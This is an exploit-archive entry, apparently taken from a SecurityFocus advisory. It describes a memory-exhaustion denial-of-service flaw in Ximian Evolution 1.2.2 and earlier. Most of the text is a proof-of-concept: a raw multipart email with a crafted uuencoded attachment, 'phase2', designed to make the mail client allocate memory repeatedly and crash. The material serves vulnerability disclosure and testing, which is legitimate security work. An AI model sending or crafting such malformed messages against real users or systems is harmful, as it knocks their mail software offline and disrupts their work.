30 lines
No EOL
1.3 KiB
Text
30 lines
No EOL
1.3 KiB
Text
source: https://www.securityfocus.com/bid/7118/info
|
|
|
|
A vulnerability has been discovered in the Ximian Evolution Mail User Agent (MUA). The problem occurs when the mailer attempts to process a maliciously encoded e-mail message. When attempting to decode the message, the MUA will repeatedly attempt to allocate memory, resulting in system resource exhaustion and will eventually crash.
|
|
|
|
This vulnerability affects Ximian Evolution version 1.2.2 and earlier.
|
|
|
|
From xxx@corest.com Wed Mar 5 14:06:02 2003
|
|
Subject: xxx
|
|
From: X X. X <xxx@corest.com>
|
|
To: xxx@corest.com
|
|
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
|
|
Message-Id: <1046884154.1731.5.camel@vaiolin>
|
|
Mime-Version: 1.0
|
|
Date: 05 Mar 2003 14:09:14 -0300
|
|
|
|
--=-mTDu5zdJIsixETTwCF5Y
|
|
Content-Disposition: inline; filename=name
|
|
Content-Type: application/octet-stream; name=name
|
|
Content-Transfer-Encoding: 7bit
|
|
|
|
begin 600 phase2
|
|
M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310
|
|
M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C
|
|
M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC
|
|
M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T
|
|
M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A-
|
|
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@
|
|
|
|
end
|
|
--=-mTDu5zdJIsixETTwCF5Y-- |